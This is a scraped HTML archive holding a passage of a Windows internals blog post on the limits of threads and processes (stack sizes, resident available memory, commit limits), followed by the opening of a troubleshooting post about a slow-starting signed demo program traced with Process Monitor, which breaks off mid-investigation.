Here’s the Dumpbin output with the /headers option for the executable generated by a new Visual Studio project: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121137iF90BA12EB3CC8DB7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Converting the numbers from hexadecimal, you can see the stack reserve size is 1MB and the initial commit is 4K and using the new Sysinternals <A href="#" target="_blank"> VMMap </A> tool to attach to this process and view its address space, you can clearly see a thread stack’s initial committed page, a guard page, and the rest of the reserved stack memory: </P> <P> <IMG alt="image" border="0" height="68" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121138i3B2441C8F1A1AF0E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Because each thread consumes part of a process’s address space, processes have a basic limit on the number of threads they can create that’s imposed by the size of their address space divided by the thread stack size. </P> <H3> 32-bit Thread Limits </H3> <P> Even if the thread had no code or data and the entire address space could be used for stacks, a 32-bit process with the default 2GB address space could create at most 2,048 threads. 
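</P> <P> The 2,048 figure is simply the address space divided by the default stack reserve. A minimal Python sketch of that arithmetic follows; the function name is made up for illustration, and the result is an upper bound that assumes nothing but stacks occupies the address space. </P>

```python
KB = 1024
MB = 1024 * KB
GB = 1024 * MB


def max_threads_by_address_space(address_space_bytes, stack_reserve_bytes):
    """Upper bound on threads if the whole address space held only stacks."""
    return address_space_bytes // stack_reserve_bytes


# Default 2GB user address space and the linker's default 1MB stack reserve.
print(max_threads_by_address_space(2 * GB, 1 * MB))  # 2048
```

<P>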
Here’s the output of the <A href="#" target="_blank"> Testlimit </A> tool running on 32-bit Windows with the –t switch (create threads) confirming that limit: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121139i82087290E6A12CFD" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Again, since part of the address space was already used by the code and initial heap, not all of the 2GB was available for thread stacks, thus the total threads created could not quite reach the theoretical limit of 2,048. </P> <P> I linked the Testlimit executable with the large address space-aware option, meaning that if it’s presented with more than 2GB of address space (for example on 32-bit systems booted with the /3GB or /USERVA Boot.ini option or its equivalent BCD option on Vista and later <I> increaseuserva </I> ), it will use it. 32-bit processes are given 4GB of address space when they run on 64-bit Windows, so how many threads can the 32-bit Testlimit create when run on 64-bit Windows? Based on what we’ve covered so far, the answer should be roughly 4096 (4GB divided by 1MB), but the number is actually significantly smaller. 
Here’s 32-bit Testlimit running on 64-bit Windows XP: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121140i973B4583320836D8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The reason for the discrepancy comes from the fact that when you run a 32-bit application on 64-bit Windows, it is actually a 64-bit process that executes 64-bit code on behalf of the 32-bit threads, and therefore there is a 64-bit thread stack and a 32-bit thread stack area reserved for each thread. The 64-bit stack has a reserve of 256K (except that on systems prior to Vista, the initial thread’s 64-bit stack is 1MB). Because every 32-bit thread begins its life in 64-bit mode and the stack space it uses when starting exceeds a page, you’ll typically see at least 16KB of the 64-bit stack committed. Here’s an example of a 32-bit thread’s 64-bit and 32-bit stacks (the one labeled “Wow64” is the 32-bit stack): </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121141i791E185F79CB743F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> 32-bit Testlimit was able to create 3,204 threads on 64-bit Windows, which given that each thread uses 1MB+256K of address space for stack (again, except the first on versions of Windows prior to Vista, which uses 1MB+1MB), is exactly what you’d expect. 
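</P> <P> That expectation can be checked with quick arithmetic. The Python sketch below uses only the stack sizes quoted above and treats the entire 4GB as available for stacks, so it yields an upper bound; the measured 3,204 sits a little under it, presumably because code, heap, and other allocations also occupy address space, as in the 32-bit case. </P>

```python
KB = 1024
MB = 1024 * KB
GB = 1024 * MB

stack_32bit_reserve = 1 * MB    # default 32-bit stack reserve from the text
stack_64bit_reserve = 256 * KB  # 64-bit stack reserve from the text

# Every thread of a 32-bit process on 64-bit Windows reserves both stacks.
per_thread = stack_32bit_reserve + stack_64bit_reserve
upper_bound = (4 * GB) // per_thread

print(upper_bound)         # 3276
print(upper_bound - 3204)  # 72 (gap between the bound and the measured count)
```

<P>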
I got different results when I ran 32-bit Testlimit on 64-bit Windows 7, however: </P> <P> <IMG alt="image" border="0" height="135" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121142iE840ED659B83E4B1" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The difference between the Windows XP result and the Windows 7 result is caused by the more random nature of address space layout introduced in Windows Vista, Address Space Layout Randomization (ASLR), that leads to some fragmentation. Randomization of DLL loading and of thread stack and heap placement helps defend against malware code injection. As you can see from this VMMap output, there’s 357MB of address space still available, but the largest free block is only 128K in size, which is smaller than the 1MB required for a 32-bit stack: </P> <P> <IMG alt="image" border="0" height="163" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121143i876928902845A20D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> As I mentioned, a developer can override the default stack reserve. One reason to do so is to avoid wasting address space when a thread’s stack usage will always be significantly less than the default 1MB. 
Testlimit sets the default stack reservation in its PE image to 64K and when you include the –n switch along with the –t switch, Testlimit creates threads with 64K stacks.&nbsp; Here’s the output on a 32-bit Windows XP system with 256MB RAM (I did this experiment on a small system to highlight this particular limit): </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121144iE0773D5B13EAB32C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Note the different error, which implies that address space isn’t the issue here. In fact, 64K stacks should allow for around 32,000 threads (2GB/64K = 32,768). What’s the limit that’s being hit in this case? A look at the likely candidates, including commit and pool, doesn’t give any clues, as they’re all below their limits: </P> <P> <IMG alt="image" border="0" height="247" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121145i23CAB1B86ECC1D66" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="374" /> </P> <P> It’s only a look at additional memory information in the kernel debugger that reveals the threshold that’s being hit, resident available memory, which has been exhausted: </P> <P> <IMG alt="image" border="0" height="185" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_12.png" 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121146i6210685568811D48" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="483" /> </P> <P> Resident available memory is the physical memory that can be assigned to data or code that must be kept in RAM. Nonpaged pool and nonpaged drivers count against it, for example, as does memory that’s locked in RAM for device I/O operations. Every thread has a user-mode stack, which is what I’ve been talking about, and also a kernel-mode stack that’s used when the thread runs in kernel mode, for example while executing system calls. When a thread is active its kernel stack is locked in memory so that the thread can execute code in the kernel that can’t page fault. </P> <P> A basic kernel stack is 12K on 32-bit Windows and 24K on 64-bit Windows. 14,225 threads require about 170MB of resident available memory, which corresponds to exactly how much is free on this system when Testlimit isn’t running: </P> <P> <IMG alt="image" border="0" height="144" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121147i10DF51D6EFB3A96E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="457" /> </P> <P> Once the resident available memory limit is hit, many basic operations begin failing. 
For example, here’s the error I got when I double-clicked on the desktop’s Internet Explorer shortcut: </P> <P> <IMG alt="image" border="0" height="127" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_C851/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121148iC5E596A850812BEC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="415" /> </P> <P> As expected, when run on 64-bit Windows with 256MB of RAM, Testlimit is only able to create 6,600 threads – roughly half what it created on 32-bit Windows with 256MB RAM – before running out of resident available memory: </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121149i749EDE173AA6FA97" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The reason I said “basic” kernel stack earlier is that a thread that executes graphics or windowing functions gets a “large” stack, 20K on 32-bit Windows and 48K on 64-bit Windows, when it makes the first such call. Testlimit’s threads don’t call any such APIs, so they have basic kernel stacks. </P> <H3> 64-bit Thread Limits </H3> <P> Like 32-bit threads, 64-bit threads also have a default of 1MB reserved for stack, but 64-bit processes have a much larger user-mode address space (8TB), so address space shouldn’t be an issue when it comes to creating large numbers of threads. Resident available memory is obviously still a potential limiter, though. 
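</P> <P> To put rough numbers on resident available memory as a limiter, the following Python sketch repeats the kernel-stack arithmetic. It treats the basic kernel stack as the only per-thread charge, which is a simplification, and uses the 12K and 24K stack sizes and the 14,225-thread result quoted earlier; the helper name is illustrative. </P> <PRE>
```python
# Basic kernel stack sizes quoted in the text, in KB.
KERNEL_STACK_KB = {"32-bit": 12, "64-bit": 24}

def kernel_stack_total_kb(thread_count, stack_kb):
    """Resident memory charged for kernel stacks alone, in KB."""
    return thread_count * stack_kb

# 14,225 threads on 32-bit Windows: about 170MB (counting 1MB as 1,000K).
used_kb = kernel_stack_total_kb(14225, KERNEL_STACK_KB["32-bit"])

# The same amount of memory spent on 24K stacks supports about half as many threads.
threads_64 = used_kb // KERNEL_STACK_KB["64-bit"]

print(used_kb, threads_64)
```
</PRE> <P>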
The 64-bit version of Testlimit (Testlimit64.exe) was able to create around 6,600 threads with and without the –n switch on the 256MB 64-bit Windows XP system, the same number that the 32-bit version created, because it also hit the resident available memory limit. However, on a system with 2GB of RAM, Testlimit64 was able to create only 55,000 threads, far below the number it should have been able to create if resident available memory were the limiter (2GB/24K = 89,000): </P> <P> <IMG alt="image" border="0" height="130" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121150i48DE581EE87E26BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> In this case, it’s the initial thread stack commit that causes the system to run out of virtual memory and report the “paging file is too small” error. Once the commit level reached the size of RAM, the rate of thread creation slowed to a crawl because the system started thrashing, paging out stacks of threads created earlier to make room for the stacks of new threads, and the paging file had to expand. The results are the same when the –n switch is specified, because the threads have the same initial stack commitment. </P> <H3> Process Limits </H3> <P> The number of processes that Windows supports obviously must be less than the number of threads, since each process has at least one thread and a process itself causes additional resource usage. 
32-bit Testlimit running on a 2GB 64-bit Windows XP system created about 8,400 processes: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121151i893E19AC62BB84EE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> A look in the kernel debugger shows that it hit the resident available memory limit: </P> <P> <IMG alt="image" border="0" height="97" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121152i6E309F087AF55762" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="435" /> </P> <P> If the only cost of a process with respect to resident available memory was the kernel-mode thread stack, Testlimit would have been able to create far more than 8,400 processes on a 2GB system. The amount of resident available memory on this system when Testlimit isn’t running is 1.9GB: </P> <P> <IMG alt="image" border="0" height="45" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121153iC7E70560BCA933B9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="361" /> </P> <P> Dividing the amount of resident memory Testlimit used (1.9GB) by the number of processes it created (8,400) yields 230K of resident memory per process. 
Since a 64-bit kernel stack is 24K, that leaves about 206K unaccounted for. Where’s the rest of the cost coming from? When a process is created, Windows reserves enough physical memory to accommodate the process’s minimum working set size. This acts as a guarantee to the process that no matter what, there will be enough physical memory available to hold enough data to satisfy its minimum working set. The default working set size happens to be 200KB, a fact that’s evident when you add the Minimum Working Set column to <A href="#" target="_blank"> Process Explorer’s </A> display: </P> <P> <IMG alt="image" border="0" height="349" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_18.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121154iCB1F074155920319" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="317" /> </P> <P> The remaining roughly 6K is resident available memory charged for additional non-pageable memory allocated to represent a process. A process on 32-bit Windows will use slightly less resident memory because its kernel-mode thread stack is smaller. </P> <P> As they can for user-mode thread stacks, processes can override their default working set size with the <A href="#" target="_blank"> SetProcessWorkingSetSize </A> function. Testlimit supports a –n switch which, when combined with –p, causes child processes of the main Testlimit process to set their working set to the minimum possible, which is 80K. Because the child processes must run to shrink their working sets, Testlimit sleeps after it can’t create any more processes and then tries again to give its children a chance to execute. 
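</P> <P> The per-process accounting above can be written out as simple arithmetic. This Python sketch uses only the figures quoted in the text (1.9GB, 8,400 processes, a 24K kernel stack, a 200K default and 80K smallest minimum working set); the last line is an extrapolation under the same accounting, not a measured result. </P> <PRE>
```python
KB_PER_GB = 1024 * 1024

def per_process_kb(resident_gb, process_count):
    """Average resident memory charged per process, in KB."""
    return resident_gb * KB_PER_GB / process_count

# Lands in the neighborhood of the 230K quoted; the exact value depends on rounding of 1.9GB.
measured_kb = per_process_kb(1.9, 8400)

PER_PROCESS_KB = 230          # rounded figure used in the text
KERNEL_STACK_KB = 24          # 64-bit basic kernel stack
DEFAULT_MIN_WS_KB = 200       # default minimum working set
SMALLEST_MIN_WS_KB = 80       # smallest minimum working set a process can request

unaccounted_kb = PER_PROCESS_KB - KERNEL_STACK_KB      # the "about 206K"
other_kb = unaccounted_kb - DEFAULT_MIN_WS_KB          # the "roughly 6K"

# Extrapolation: resident cost per process if every child shrank its working set.
shrunk_kb = KERNEL_STACK_KB + SMALLEST_MIN_WS_KB + other_kb

print(round(measured_kb), unaccounted_kb, other_kb, shrunk_kb)
```
</PRE> <P>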
Testlimit executed with the –n switch on a Windows 7 system with 4GB of RAM hit a limit other than resident available memory: the system commit limit: </P> <P> <IMG alt="image" border="0" height="373" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121155iB33DBE32913B2030" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Here you can see the kernel debugger reporting not only that the system commit limit had been hit, but that there have been thousands of memory allocation failures, both virtual and paged pool allocations, following the exhaustion of the commit limit (the system commit limit was actually hit several times as the paging file was filled and then grown to raise the limit): </P> <P> <IMG alt="image" border="0" height="205" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121156iDF0AF32FAFF3924C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="463" /> </P> <P> The baseline commitment before Testlimit ran was about 1.5GB, so the processes had consumed about 8GB of committed memory. Each process therefore consumed roughly 8GB/6,600, or 1.2MB. 
The output of the kernel debugger’s !vm command, which shows the private memory allocated by each active process, confirms that calculation: </P> <P> <IMG alt="image" border="0" height="342" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_C851/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121157i991D94960AB31C3C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="383" /> </P> <P> The initial thread stack commitment, described earlier, has a negligible impact, with the rest coming from the memory required for the process address space data structures, page table entries, the handle table, process and thread objects, and private data the process creates when it initializes. </P> <H3> How Many Threads and Processes are Enough? </H3> <P> So the answer to the questions “how many threads does Windows support?” and “how many processes can you run concurrently on Windows?” is that it depends. In addition to the nuances of the way that the threads specify their stack sizes and processes specify their minimum working sets, the two major factors that determine the answer on any particular system are the amount of physical memory and the system commit limit. In any case, applications that create enough threads or processes to get anywhere near these limits should rethink their design, as there are almost always alternate ways to accomplish the same goals with a reasonable number. For instance, the general goal for a scalable application is to keep the number of threads running equal to the number of CPUs (with NUMA changing this to consider CPUs per node) and one way to achieve that is to switch from using synchronous I/O to using asynchronous I/O and rely on I/O completion ports to help match the number of running threads to the number of CPUs. 
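</P> <P> As a small illustration of the sizing guideline (not of I/O completion ports themselves), this Python sketch caps a worker pool at the number of logical CPUs instead of creating a thread per task. The task function and task sizes are made up for the example. </P> <PRE>
```python
import os
from concurrent.futures import ThreadPoolExecutor

def pool_size():
    """Number of worker threads: one per logical CPU, falling back to 1."""
    return os.cpu_count() or 1

def checksum(n):
    """Stand-in for a real unit of work."""
    return sum(range(n))

def run_tasks(task_sizes):
    """Run every task on a pool that never exceeds pool_size() threads."""
    with ThreadPoolExecutor(max_workers=pool_size()) as pool:
        return list(pool.map(checksum, task_sizes))

results = run_tasks([10, 100, 1000])
print(pool_size(), results)
```
</PRE> <P> However many tasks are queued, the pool never runs more than one thread per logical CPU, which is the point of the guideline. 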
</P> </BODY></HTML> Thu, 27 Jun 2019 06:54:50 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824 MarkRussinovich 2019-06-27T06:54:50Z The Case of the Slow Keynote Demo https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-keynote-demo/ba-p/723801 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 23, 2009 </STRONG> <BR /> <P> A couple of weeks ago I participated for the first time in the <A href="#" mce_href="#" target="_blank"> keynote at Microsoft’s Teched US conference </A> to a room of over 5,000 attendees. Bill Veghte, the Senior Vice President of Windows marketing, led the keynote and gave a tour of the user-focused features of Windows 7, Iain McDonald, General Manager for Windows Server, demonstrated new functionality in Hyper-V and Windows Server 2008 R2, and I demonstrated IT Pro-oriented enhancements in Windows 7 and Microsoft Desktop Optimization Pack (MDOP). </P> <BR /> <P> I showed features like <A href="#" mce_href="#" target="_blank"> BitLocker To Go </A> group policy settings, PowerShell v2’s remoting capabilities, PowerShell’s ability to script group policy objects, Microsoft Enterprise Desktop Virtualization (MEDV) and how the combination of App-V, roaming user profiles and folder redirection enable a replaceable PC scenario with minimal downtime. One point I reinforced was the fact that we made every effort to ensure that application-compatibility fixes (called shims) that IT Pros have developed for Vista applications work on Windows 7. I also demonstrated Windows 7’s new <A href="#" mce_href="#" target="_blank"> AppLocker </A> feature, which allows IT Pros to restrict the software that users can run on enterprise desktops with flexible rules for identifying software. 
</P> <BR /> <P> In the weeks leading up to the keynote I worked with Jason Leznek, the owner of the IT Pro portion of the keynote, to identify the features I’d showcase and to design the demos. We used dry runs to walk through the script, tweaking the demos and creating transitions, trimming content to fit the time allotted to my segment, and tightening my narration to focus on the benefits of the new technologies. For the application-compatibility demo, we decided to use a sample program used internally at Microsoft, called Stock Viewer, that’s intentionally incompatible with Vista and Windows 7 in ways representative of actual line-of-business software that doesn’t run without assistance on these newer operating systems. In my demo, I would launch Stock Viewer on Windows 7 and show how its trends report function fails with an obscure error message caused by incompatibility: </P> <BR /> <P> <IMG alt="image" border="0" height="320" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_13.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121125i8C898BE98F356B6E" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="553" /> </P> <BR /> <P> Then I’d show how I could deploy an application compatibility shim that enables the application to work correctly on Vista and then rerun the application successfully. </P> <BR /> <P> We also wanted to show how AppLocker’s rule creation wizard makes it easy to allow software to run based on the publisher or version if the software is digitally signed. Originally, we planned on showing AppLocker after the application compatibility demo and enabling Adobe Acrobat Reader, an application commonly used in enterprises. 
We rehearsed this flow a couple of times, but found the transitions a little awkward, so I suggested that we sign the Stock Viewer executable and move the AppLocker demo before the shim demo. I’d be able to enable Stock Viewer to run with an AppLocker rule and then show how the shim helps it run correctly, using it for both demos. </P> <BR /> <P> I went back to my office, signed Stock Viewer with the <A href="#" mce_href="#" target="_blank"> Sysinternals </A> signing certificate and sent it to Jason. A few hours later he emailed me saying that something was wrong with the demo system because Stock Viewer, which had previously launched instantly, now took over a minute to start. We were counting down to TechEd and he was panicked because we needed to nail down the demos. I had heard at some point in the past that .NET does Authenticode signature checks when it loads digitally signed assemblies, so my first suspicion was that the delay was related to that. I asked Jason to capture a <A href="#" mce_href="#" target="_blank"> Process Monitor </A> trace and he emailed it back a few minutes later. 
</P> <BR /> <P> After opening the log, the first thing I did was filter events for StockViewer.exe by finding its first operation and right-clicking to set a quick filter: </P> <BR /> <P> <IMG alt="image" border="0" height="226" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121126iFB6EC9D5229FA404" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="358" /> </P> <BR /> <P> Then I looked at the timestamps on the first item, 2:27:20, and the last item, 2:28:32, which correlated with the minute delay Jason had observed. As I scrolled through the trace I saw many references to cryptography (crypto) Registry keys and file system directories, as well as references to TCP/IP settings, but I knew that there had to be at least one major gap in the timestamps to account for the long delay. 
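</P> <BR /> <P> Looking for such gaps by eye works for a short trace, but the same scan can be automated. The Python sketch below takes a list of time-of-day strings and reports consecutive events separated by at least a given number of seconds. The sample timestamps are invented for illustration and are not taken from the actual trace. </P> <PRE>
```python
from datetime import datetime

def find_gaps(timestamps, min_gap_seconds):
    """Return (before, after, seconds) for consecutive events at least min_gap_seconds apart."""
    times = [datetime.strptime(t, "%H:%M:%S") for t in timestamps]
    gaps = []
    for i in range(1, len(times)):
        seconds = (times[i] - times[i - 1]).total_seconds()
        if seconds >= min_gap_seconds:
            gaps.append((timestamps[i - 1], timestamps[i], seconds))
    return gaps

# Hypothetical event times; a real list would come from an exported trace.
sample = ["2:27:20", "2:27:22", "2:27:32", "2:27:33", "2:27:45"]

for before, after, seconds in find_gaps(sample, 5):
    print(before, after, seconds)
```
</PRE> <BR /> <P>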
I scanned the log from the beginning and found a gap of roughly 10 seconds at 2:27:22: </P> <BR /> <P> <IMG alt="image" border="0" height="162" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_1.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121127iCEB0954B54CBF6BE" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> The operations immediately before were references to the Rasadhlp.dll, a networking-related DLL, and a little earlier there were lots of references to Winsock registry keys, with accesses to crypto Registry keys immediately after the 10 second delay. It appeared that the system was not connected to the Internet and that the application was held up by some networking timeout of roughly 10 seconds. I looked forward in order to find the next gap and came across a 12-second interval: </P> <BR /> <P> <IMG alt="image" border="0" height="109" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121128iEA30324415C91BC3" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> Again, networking-related activity before, and crypto related activity after. 
The subsequent gap, also of 12-seconds, was identical: </P> <BR /> <P> <IMG alt="image" border="0" height="125" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_4.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121129i5CED0AADB277583C" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> In fact, the next few gaps looked virtually identical. In each case there was a reference to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections immediately before the pause, so I set a filter for that path and RegOpenKey and sure enough, could easily see six gaps of exactly 12-seconds each: </P> <BR /> <P> <IMG alt="image" border="0" height="135" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121130i7DD34D6D0F2795B2" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> The sum of the gaps – 12 times 6 – equaled the delay Jason was seeing. Next, I wanted to verify that the repeated attempts to access the network were caused by signing verification so I started looking at the stacks of various events by selecting them and typing Ctrl+K to open the stack properties dialog. 
